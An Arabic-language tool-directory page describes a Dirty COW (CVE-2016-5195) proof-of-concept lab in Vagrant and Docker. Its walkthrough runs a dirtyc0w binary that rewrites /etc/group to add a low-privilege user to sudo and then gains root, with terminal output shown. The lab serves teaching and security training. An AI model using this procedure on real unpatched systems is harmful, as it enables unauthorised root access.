Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Dirty-COW-CVE-2016-5195- — استغلال ثغرة dirtycow لتسجيل الدخول كـ root | Kitploit
أدوات/GitHubGitHub/zakariamaaraki/dirty-cow-cve-2016-5195-
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمالهروب من الحاويةمختبرات وتدريب عملي
GitHubzakariamaaraki/dirty-cow-cve-2016-5195-

Dirty-COW-CVE-2016-5195-

استغلال ثغرة dirtycow لتسجيل الدخول كـ root

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 5 سنواتلم تتم المراجعة بعد

Dirtyc0w Docker POC

المتطلبات الأساسية:

  • تثبيت Vagrant

كيفية الاستخدام

أولاً، قم باستنساخ المشروع git clone https://github.com/BrolyCode/Dirty-Cow.git ادخل إلى المجلد cd Dirty-Cow ثم قم بتشغيل البيئة باستخدام الأمر

root@kitploit:~
vagrant up

بمجرد بناء الخادم، سنتصل به عبر SSH

root@kitploit:~
vagrant ssh

قم بالتبديل إلى المستخدم الجذر

root@kitploit:~
sudo -i

الآن يمكننا تسجيل الدخول كمخترق (hacker)

root@kitploit:~
docker exec -it -u hacker nginx bash

في المجلد الذي سجلنا الدخول إليه، لدينا الملفات التالية

root@kitploit:~
drwxrwxrwt  2 root root  4096 Nov  26 11:10 .
drwxr-xr-x 41 root root  4096 Nov  26 11:10 ..
-rwxr-xr-x  1 root root  9880 Nov  26 04:52 dirtyc0w
-rwxrwxrwx  1 root root  9880 Nov  26 04:52 dirtyc0w.c

إذا قمنا بعرض محتوى الملف /etc/group سنرى

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
....

يمكننا محاولة تسجيل الدخول كجذر

root@kitploit:~
sudo -i

لكن النظام سيرفض، لأننا لا نملك صلاحية الوصول. سنقوم الآن باستغلال الثغرة في /etc/group

root@kitploit:~
./dirtyc0w 

سيطبع ما يلي على الطرفية، يجب أن ننتظر قليلاً (2/3 دقائق).

root@kitploit:~
mmap 7fd0facf4000

madvise 0

procselfmem 1500000000

ثم سنعرض /etc/group مرة أخرى

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:hacker
...

تسجيل الدخول كجذر

root@kitploit:~
sudo -i

root@27862a2f9973:~#

التنظيف

اخرج مرة أخرى إلى طرفية جهازك المضيف وقم بتنفيذ vagrant destroy

تنزيل الأداة